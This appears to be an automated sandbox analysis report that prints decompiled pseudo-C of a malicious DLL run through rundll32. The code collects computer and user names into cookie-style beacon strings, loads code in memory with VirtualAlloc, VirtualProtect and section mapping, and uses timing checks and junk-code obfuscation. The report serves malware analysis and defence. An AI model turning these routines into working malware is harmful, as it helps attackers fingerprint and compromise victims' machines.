      • Instruction Fuzzy Hash: 55317872600B88DAEB96DB22F4443D973A1AB4DBC5F48C025EA0D0A765DF38C64EC300
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$Free$AddressAllocAllocateInformationLibraryLoadProcQuerySystem
      • String ID: NTDLL.DLL$ZwQuerySystemInformation
      • API String ID: 2948972359-2445179936
      • Opcode ID: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
      • Instruction ID: c553ab603bbb7ea155e402bcf953277eb51bc389a09fd2bd74e1016edb044849
      • Opcode Fuzzy Hash: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
      • Instruction Fuzzy Hash: 5B313E72715A89C6FADADB56A8043D972A1AB4CBC2F48C034FB0957754EF3CCA4D8705
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 48%
      			E00000001180002018(long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi) {
      				void* __rbp;
      				void* _t32;
      				int _t34;
      				void* _t35;
      				void* _t37;
      				void* _t43;
      				void* _t45;
      				signed long long _t51;
      				signed long long _t54;
      				signed long long _t81;
      				void* _t85;
      				WCHAR* _t87;
      				void* _t88;
      				signed long long _t90;
      				void* _t91;
      				WCHAR* _t100;
      				WCHAR* _t102;
      
      				_t51 = _t90;
      				 *((long long*)(_t51 + 0x10)) = __rbx;
      				 *((long long*)(_t51 + 0x18)) = __rsi;
      				 *((long long*)(_t51 + 0x20)) = __rdi;
      				_t88 = _t51 - 0x168;
      				_t91 = _t90 - 0x250;
      				_t81 = __rdx;
      				 *((intOrPtr*)(_t88 + 0x170)) = 0x100;
      				_t85 = __rcx;
      				__imp__GetComputerNameExW(); // executed
      				if (_t32 != 0) goto 0x8000206a;
      				 *((intOrPtr*)(_t91 + 0x40)) = 0x78;
      				E000000011800014B4(_t32, _t45, __rbx, __rcx, L"; _u=", __rcx, _t88, _t91 + 0x40);
      				 *((intOrPtr*)(_t88 + 0x170)) = 0x100;
      				_t54 = _t51; // executed
      				_t34 = GetUserNameW(_t102); // executed
      				if (_t34 != 0) goto 0x800020a9;
      				 *((intOrPtr*)(_t91 + 0x40)) = 0x78;
      				_t35 = E000000011800014B4(_t34, _t45, _t54, _t85 + _t54 * 2, ":", _t85, _t88, _t91 + 0x40);
      				_t55 = _t54 + _t51;
      				E000000011800014B4(_t35, _t45, _t54 + _t51, _t85 + (_t54 + _t51) * 2, ":", _t85, _t88, __rdx);
      				_t37 = E00000001180001C28(_t43, _t51, _t55 + _t51, _t85 + (_t54 + _t51) * 2, _t91 + 0x20);
      				r14d = _t37;
      				if (_t37 == 0) goto 0x80002144;
      				r9d =  *((intOrPtr*)(_t91 + 0x20));
      				wsprintfW(_t100);
      				goto 0x8000213d;
      				r9d =  *((intOrPtr*)(_t91 + 0x20 + _t81 * 4));
      				wsprintfW(_t87);
      				if (_t81 + 1 - _t100 < 0) goto 0x80002117;
      				goto 0x80002153;
      				r9d = 0;
      				return wsprintfW(??, ??);
      			}

      0x180002018
      0x18000201b
      0x18000201f
      0x180002023
      0x18000202c
      0x180002033
      0x18000203a
      0x18000203d
      0x180002047
      0x180002058
      0x180002060
      0x180002062
      0x180002079
      0x180002085
      0x180002094
      0x180002097
      0x18000209f
      0x1800020a1
      0x1800020b9
      0x1800020be
      0x1800020cf
      0x1800020e1
      0x1800020e6
      0x1800020fd
      0x1800020ff
      0x180002104
      0x180002115
      0x180002117
      0x18000212e
      0x180002140
      0x180002142
      0x180002144
      0x180002172

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf$Name$ComputerUser
      • String ID: %s%u$; __io=$; _u=$x
      • API String ID: 4095488650-3513353778
      • Opcode ID: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
      • Instruction ID: 7d741998cccdb29629df25af753f6537b3149e73fb9b8afa304b05458abafeeb
      • Opcode Fuzzy Hash: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
      • Instruction Fuzzy Hash: A73149B2704A8992EBA2CB11E8443D97370F75C7C5F948126EA4D5B665EF3CC60EC740
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
      • String ID:
      • API String ID: 2409119217-0
      • Opcode ID: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
      • Instruction ID: bccd91b441821ca56803e91b7d04f4d1ec65d623121010ca1dafda4b918fcf64
      • Opcode Fuzzy Hash: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
      • Instruction Fuzzy Hash: 06315E72701B498AEB62DF74E4443D933E5EB4DBC9F548026EA4D56A58EF38C60CC340
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 58%
      			E00000001180002174(void* __eax, void* __edx, void* __edi, void* __eflags, signed int __rax, signed int __rbx, signed int __rdx, long long __rdi, void* __rsi, void* __r11, void* __r14) {
      				void* __rbp;
      				void* _t27;
      				void* _t45;
      				signed long long _t54;
      				signed long long _t60;
      				void* _t75;
      				long _t78;
      				void* _t79;
      				void* _t81;
      				void* _t88;
      
      				_t77 = __rsi;
      				 *((long long*)(_t81 + 0x18)) = __rbx;
      				 *((long long*)(_t81 + 0x20)) = __rdi;
      				_t79 = _t81 - 0x57;
      				asm("rdtsc");
      				_t54 = __rax | __rdx << 0x00000020;
      				_t57 = __rbx << 0x00000010 | _t60;
      				SleepEx(_t78); // executed
      				_t75 = __rdi - 1;
      				if (__eflags != 0) goto 0x80002190;
      				wsprintfW(??, ??);
      				E00000001180002428(_t79 - 0x29, __rbx << 0x00000010 | _t60);
      				_t9 = _t75 + 1; // 0x4
      				E00000001180002860(0, _t9, _t45, _t54, __rbx << 0x00000010 | _t60, _t79 - 0x29, L"%016IX", __rsi, _t79, _t79 - 0x69, _t88);
      				if (_t54 == 0) goto 0x8000224e;
      				if (E00000001180001D80(_t9, _t54, _t54, _t57, _t79 + 0x1b, _t54, _t77, _t79, _t79 + 0x67, _t79 + 0x6f, __r11, __r14) == 0) goto 0x8000224e;
      				if ( *((intOrPtr*)(_t79 + 0x6f)) - 0x400 < 0) goto 0x8000224e;
      				_t27 = E00000001180001198(_t54,  *((intOrPtr*)(_t79 + 0x67)),  *((intOrPtr*)(_t79 + 0x6f)), _t79 + 0x67);
      				if ( *((intOrPtr*)(_t79 + 0x67)) == 0) goto 0x80002232;
      				GetProcessHeap();
      				HeapFree(??, ??, ??);
      				E00000001180001B5C(_t27, _t54,  *((intOrPtr*)(_t79 + 0x67)), _t79 - 0x69,  *((intOrPtr*)(_t79 + 0x6f)), _t77);
      				if (_t54 == 0) goto 0x8000224e;
      				E00000001180002480(_t54, _t79 + 0x1b, _t54);
      				return 0;
      			}

      0x180002174
      0x180002174
      0x180002179
      0x18000217f
      0x180002194
      0x18000219a
      0x1800021a0
      0x1800021a8
      0x1800021ae
      0x1800021b2
      0x1800021c2
      0x1800021cc
      0x1800021d8
      0x1800021db
      0x1800021e3
      0x1800021fb
      0x180002208
      0x18000220e
      0x18000221c
      0x18000221e
      0x18000222c
      0x180002238
      0x180002240
      0x180002249
      0x180002264

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcessSleepwsprintf
      • String ID: %016IX
      • API String ID: 2187706517-1811457740
      • Opcode ID: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
      • Instruction ID: 661cb7bdf0d2a5cc3032a3c802704869fbd6bc5f67ca47283b56c7d180ea033d
      • Opcode Fuzzy Hash: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
      • Instruction Fuzzy Hash: E9214F72300A499AEB92DFA1D9543DD33A6E7487C4F888425BE0D6B699EE38D64CC350
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Control-flow graph legend: Executed / Not Executed. Rendered graph of basic blocks 7ffa65c55ff9 through 7ffa65c56789 (API blocks: NtCreateSection at 7ffa65c5620e, NtMapViewOfSection at 7ffa65c566a7; calls to 7ffa65c57947); block/edge serialization omitted.
      C-Code - Quality: 100%
      			E00007FFA7FFA65C55FF9(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344) {
      				intOrPtr _t40;
      				void* _t57;
      
      				_a344 = 0x18f;
      				_a344 = _a344 + 0xff;
      				_a324 = 0x1d29;
      				_a324 = _a324 + 0x3c;
      				if (__ecx == __ecx) goto 0x65c56042;
      				_a336 = 0x7b;
      				_a336 = _a336;
      				if (__edx == __edx) goto 0x65c5608a;
      				_a328 = 6;
      				_a328 = _a328 + 0x27;
      				if (__ebx == __ebx) goto 0x65c56059;
      				_a332 = 0x35;
      				_a332 = _a332 + 0x17;
      				if (__eax == __eax) goto 0x65c5602b;
      				_a312 = 0x19cc;
      				_a312 = _a312 + 0xa0;
      				if (__ebx == __ebx) goto 0x65c560a5;
      				_a340 = 0xd9;
      				_a340 = _a340 + 0x81;
      				goto E00007FFA7FFA65C55FF9;
      				_a316 = 0x5c;
      				_a316 = _a316 + 0x8f;
      				if (__ecx == __ecx) goto 0x65c560d7;
      				_a308 = 7;
      				_a308 = _a308 + 0x12;
      				if (__ecx == __ecx) goto 0x65c56070;
      				_a320 = 0x24b;
      				_a320 = _a320 + 0x30;
      				if (__edx == __edx) goto L1;
      				_t40 =  *((intOrPtr*)(_t57 + 0x70 + _a80 * 4));
      				if (_t40 - 0x1f4 <= 0) goto 0x65c560f2;
      				return _t40;
      			}

      0x7ffa65c55ff9
      0x7ffa65c56004
      0x7ffa65c56014
      0x7ffa65c5601f
      0x7ffa65c56029
      0x7ffa65c5602b
      0x7ffa65c56036
      0x7ffa65c56040
      0x7ffa65c56042
      0x7ffa65c5604d
      0x7ffa65c56057
      0x7ffa65c56059
      0x7ffa65c56064
      0x7ffa65c5606e
      0x7ffa65c56070
      0x7ffa65c5607b
      0x7ffa65c56088
      0x7ffa65c5608a
      0x7ffa65c56095
      0x7ffa65c560a0
      0x7ffa65c560a5
      0x7ffa65c560b0
      0x7ffa65c560be
      0x7ffa65c560c0
      0x7ffa65c560cb
      0x7ffa65c560d5
      0x7ffa65c560d7
      0x7ffa65c560e2
      0x7ffa65c560ec
      0x7ffa65c560f7
      0x7ffa65c56105
      0x7ffa65c5611b

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID: CreateSection
      • String ID: $$'$<
      • API String ID: 2449625523-1052150772
      • Opcode ID: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
      • Instruction ID: 8f95168fea3bebebc5f453c317db184a386bce69e7e13fa3326a3168ab61e92e
      • Opcode Fuzzy Hash: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
      • Instruction Fuzzy Hash: A5211B7780C6C2CFE7708B94E4483BBB7A0E786B16F508535D38A46A89DB7DD4989F00
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 100%
      			E00007FFA7FFA65C55FE6(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a88, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344, intOrPtr _a448) {
      				intOrPtr _t41;
      
      				if (_a88 < 0) goto 0x65c55fdd;
      				_t41 = _a448;
      				_a344 = 0x18f;
      				_a344 = _a344 + 0xff;
      				_a324 = 0x1d29;
      				_a324 = _a324 + 0x3c;
      				if (__ecx == __ecx) goto 0x65c56042;
      				_a336 = 0x7b;
      				_a336 = _a336;
      				if (__edx == __edx) goto 0x65c5608a;
      				_a328 = 6;
      				_a328 = _a328 + 0x27;
      				if (__ebx == __ebx) goto 0x65c56059;
      				_a332 = 0x35;
      				_a332 = _a332 + 0x17;
      				if (_t41 == _t41) goto 0x65c5602b;
      				_a312 = 0x19cc;
      				_a312 = _a312 + 0xa0;
      				if (__ebx == __ebx) goto 0x65c560a5;
      				_a340 = 0xd9;
      				_a340 = _a340 + 0x81;
      				goto L1;
      				_a316 = 0x5c;
      				_a316 = _a316 + 0x8f;
      				if (__cx == __cx) goto 0x65c560d7;
      				_a308 = 7;
      				_a308 = _a308 + 0x12;
      				if (__ch == __ch) goto 0x65c56070;
      				_a320 = 0x24b;
      				_a320 = _a320 + 0x30;
      				if (__dl == __dl) goto L2;
      				__eax =  *((intOrPtr*)(__rsp + 0x70 + _a80 * 4));
      				if (__eax - 0x1f4 <= 0) goto 0x65c560f2;
      				_t38 = __r10;
      				__r10 = __rsp;
      				__rsp = _t38;
      				__r11 = __r11 << 0x40;
      				return __eax;
      			}

      0x7ffa65c55feb
      0x7ffa65c55fed
      0x7ffa65c55ff9
      0x7ffa65c56004
      0x7ffa65c56014
      0x7ffa65c5601f
      0x7ffa65c56029
      0x7ffa65c5602b
      0x7ffa65c56036
      0x7ffa65c56040
      0x7ffa65c56042
      0x7ffa65c5604d
      0x7ffa65c56057
      0x7ffa65c56059
      0x7ffa65c56064
      0x7ffa65c5606e
      0x7ffa65c56070
      0x7ffa65c5607b
      0x7ffa65c56088
      0x7ffa65c5608a
      0x7ffa65c56095
      0x7ffa65c560a0
      0x7ffa65c560a5
      0x7ffa65c560b0
      0x7ffa65c560be
      0x7ffa65c560c0
      0x7ffa65c560cb
      0x7ffa65c560d5
      0x7ffa65c560d7
      0x7ffa65c560e2
      0x7ffa65c560ec
      0x7ffa65c560f7
      0x7ffa65c56105
      0x7ffa65c5610e
      0x7ffa65c5610e
      0x7ffa65c5610e
      0x7ffa65c56116
      0x7ffa65c5611b

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID: CreateSection
      • String ID:
      • API String ID: 2449625523-0
      • Opcode ID: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
      • Instruction ID: 07ae4e7b80015b288a4028d9cb93d811ed02dbb4ca6f5c3a02a754ee45117526
      • Opcode Fuzzy Hash: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
      • Instruction Fuzzy Hash: 02114F7390CAC1CAE7B08B90E0443AAB7A1F782795F904035E38E46E98DF7DD4948F01
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 43%
      			E00000001180002860(void* __ebx, void* __edx, void* __ebp, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
      				void* __rdi;
      				int _t23;
      				int _t24;
      				void* _t35;
      				long long* _t42;
      				void* _t47;
      				signed long long _t48;
      				signed long long _t49;
      				long long* _t72;
      				void* _t74;
      
      				_t42 = __rax;
      				_a8 = __rbx;
      				_a16 = __rbp;
      				_a24 = __rsi;
      				_t74 = __r8;
      				GetProcessHeap();
      				r8d = 0x2001;
      				RtlAllocateHeap(??, ??, ??); // executed
      				_t72 = __rax;
      				if (__rax == 0) goto 0x80002959;
      				r9d = _t35;
      				_t23 = wsprintfW(??, ??);
      				r9d = __edx;
      				_t24 = wsprintfW(??, ??);
      				r9d = E00000001180001484(_t24, __rax, L"%s%u");
      				_t47 = _t23 + _t24 + wsprintfW(??, ??);
      				r9d = E0000000118000108C(__rax, _t47, __r8);
      				_t48 = _t47 + wsprintfW(??, ??);
      				E00000001180001904(__rax, _t48, __rax + _t48 * 2, _t74);
      				_t49 = _t48 + __rax;
      				E000000011800027B4(__rax, _t49, __rax + _t49 * 2);
      				_t50 = _t49 + __rax;
      				E00000001180002018(_t49 + __rax, __rax + (_t49 + __rax) * 2, _t74, __rax, _t74);
      				return E0000000118000133C(_t50 + _t42, _t72 + (_t50 + _t42) * 2, _t74, ":");
      			}

      Instruction addresses (one per decompiled statement above): 0x180002860, 0x180002860, 0x180002865, 0x18000286a, 0x180002874, 0x18000287b, 0x180002886, 0x18000288f, 0x180002895, 0x18000289b, 0x1800028a1, 0x1800028b5, 0x1800028be, 0x1800028d6, 0x1800028eb, 0x180002901, 0x18000290d, 0x180002923, 0x18000292a, 0x18000292f, 0x180002936, 0x18000293b, 0x180002945, 0x18000296d

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf$Heap$Process$AddressLibraryLoadProc$AdaptersAllocInfoName$AllocateComputerCount64FreeInformationQuerySystemTickUser
      • String ID: %s%u$Cookie: __gads=
      • API String ID: 392523097-3007860590
      • Opcode ID: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
      • Instruction ID: 8f6dff4a45bc758f9ad86f1329c8408aa2d07b8871dc2bc0e96f96c00fe38273
      • Opcode Fuzzy Hash: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
      • Instruction Fuzzy Hash: 2C214872740A0996EB92DB55F8543E87360BB5CBC1F848129AB4D57772EE3CC62DC340
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Control-flow graph (rendered graph not captured): block 180001bd4-180001c0c calls LoadLibraryA and GetProcAddress, then either runs block 180001c0e-180001c13 (GetNativeSystemInfo) or branches directly to the final block 180001c15-180001c25; both paths end at 180001c15-180001c25.
      APIs
      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00000001800019FF), ref: 0000000180001BF1
      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00000001800019FF), ref: 0000000180001C01
      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,0000011C,00000001800019FF), ref: 0000000180001C13
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: AddressInfoLibraryLoadNativeProcSystem
      • String ID: GetNativeSystemInfo$KERNEL32.DLL
      • API String ID: 2103483237-4162215167
      • Opcode ID: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
      • Instruction ID: 8e61e42ac17d5e92d5409a7507b4c0ea04a19fa1e2651f3f55c474f49308d06d
      • Opcode Fuzzy Hash: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
      • Instruction Fuzzy Hash: 0BE06D72B24509D2EB93EB20E8543D93360FB9C780F848221A54E026A4EF2CD78DC740
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Control-flow graph (rendered graph not captured; 143 basic blocks): entry block 21281d00000-21281d0008f calls 21281d00618 six times; API-calling blocks are 21281d00127-21281d00159 (GetNativeSystemInfo), 21281d0015f-21281d0017b (VirtualAlloc), 21281d002f1-21281d0030a (LoadLibraryA) and 21281d004bd-21281d004ca (VirtualProtect); failure paths converge on 21281d005fa and the function exits through block 21281d005fc-21281d00616.
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.432142362.0000021281D00000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021281D00000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_21281d00000_rundll32.jbxd
      Similarity
      • API ID: Virtual$AllocInfoLibraryLoadNativeProtectSystem
      • String ID:
      • API String ID: 395219687-0
      • Opcode ID: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
      • Instruction ID: 35303cf2acb6a0d4121e7d4754d452ef11632639272d3bb8323fc264071ca411
      • Opcode Fuzzy Hash: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
      • Instruction Fuzzy Hash: 14221C30618E29DFEB68AE58D8493F573D1FB64351F26012DE88BC32C1EA34EC578695
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Control-flow graph (rendered graph not captured): block 180001318-18000131c enters the loop header 180001329-180001330, which either calls SleepEx in block 18000131e-180001323 and loops back to the header, or falls through to block 180001332-180001334 (ExitProcess).
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: ExitProcessSleep
      • String ID:
      • API String ID: 911557368-0
      • Opcode ID: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
      • Instruction ID: 6bf3646277ed7659d23c391addaeef7dd43479a1e5d5f4f4aeea11294e6aed9e
      • Opcode Fuzzy Hash: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
      • Instruction Fuzzy Hash: C3D01231200248C7F2DBA721E8183EC3164A308382F90C129A106444E08F380B8C8304
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 72%
      			E00007FFA7FFA65C536FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr* _a8, intOrPtr* _a16, signed int _a33, char _a36, char _a37, long long _a40, long long _a48, long long _a56, signed int _a64, long long _a72, long long _a80, long long _a88, long long _a96, void* _a136) {
      				unsigned int _v48;
      				intOrPtr _v64;
      				intOrPtr* _v72;
      				unsigned int _v80;
      				char _v87;
      				char _v88;
      				long long _v104;
      				signed long long _v112;
      				intOrPtr _t63;
      				intOrPtr _t64;
      				intOrPtr _t65;
      				signed int _t70;
      				signed int _t71;
      				intOrPtr _t76;
      				signed int _t77;
      				signed int _t78;
      				void* _t82;
      				signed int _t87;
      				void* _t92;
      				void* _t101;
      				long long _t128;
      				long long _t129;
      				long long _t130;
      				long long _t132;
      				long long _t133;
      				void* _t140;
      				void* _t141;
      				intOrPtr* _t154;
      				long long _t155;
      				void* _t156;
      				void* _t157;
      				void* _t158;
      				void* _t159;
      				void* _t160;
      				void* _t161;
      				void* _t162;
      				void* _t163;
      				void* _t164;
      				void* _t165;
      				void* _t166;
      				void* _t167;
      				void* _t168;
      
      				_t92 = __edx;
      				_t128 = _a56 + 2;
      				if (__esp == __esp) goto 0x65c53721;
      				_t64 = E00007FFA7FFA65C57947(_t63, __ebx, _t82, __edx, __edi, __esi, _t128, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
      				_a96 = _t128;
      				goto 0x65c53845;
      				goto 0x65c53708;
      				_a56 = _t128;
      				_t129 = _a40;
      				if (_t64 == _t64) goto 0x65c536ec;
      				_t65 = E00007FFA7FFA65C57947(_t64, __ebx, 0xd45a1e1f, _t92, __edi, __esi, _t129, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
      				_a88 = _t129;
      				if (_t92 == _t92) goto 0x65c53717;
      				 *((intOrPtr*)(_a136 + 8)) = _t65;
      				if (__esi == __esi) goto 0x65c5375b;
      				r8d = r8d + 2;
      				if (0xd45a1e1f == 0xd45a1e1f) goto 0x65c53767;
      				if (0x67cc0818 == 0x67cc0818) goto 0x65c5372f;
      				_t143 = _a56;
      				E00007FFA7FFA65C58D0B(_t65, 0x67cc0818, __esi, _t101, __esp, _t129, _a56,  &_a36, _t156, _t157, _t158, _t160, _t162, _t163, _t164, _t165, _t166, _t167);
      				_a96();
      				_t87 = _a33;
      				E00007FFA7FFA65C53D78(_t87, __esp, _t129, _t140, _t143,  &_a36, _t157, _t158, _t162, _t166, _t167);
      				if (_t87 == _t87) goto 0x65c537c0;
      				_t70 = _t87;
      				if (_t92 == _t92) goto 0x65c5379e;
      				_t154 = _a136;
      				if (__ebx == __ebx) goto 0x65c53776;
      				_t71 = _t70 << 4;
      				_a64 = _t71;
      				if (_t71 == _t71) goto 0x65c53786;
      				if ((_a64 | _t71) == (_a64 | _t71)) goto 0x65c53793;
      				_t155 =  *_t154;
      				 *(_t155 +  *((intOrPtr*)(_t129 + 0x30))) = _t71;
      				goto 0x65c537d7;
      				goto 0x65c539c6;
      				if (_a48 - _t129 >= 0) goto 0x65c537d7;
      				_t130 = _a48;
      				goto 0x65c537f2;
      				goto 0x65c5395d;
      				_a80 = _t130;
      				E00007FFA7FFA65C5A588(1, _t140, _t155, _t156, _t162, _t163, _t164, _t166, _t168);
      				if (__edi == __edi) goto 0x65c5381a;
      				_t161 = _a56 + _t130;
      				if (__ebx == __ebx) goto 0x65c53828;
      				if (__esp == __esp) goto 0x65c5380e;
      				if (__esp == __esp) goto 0x65c53834; // executed
      				RtlAllocateHeap(??, ??, ??);
      				if (__edi == __edi) goto 0x65c53854;
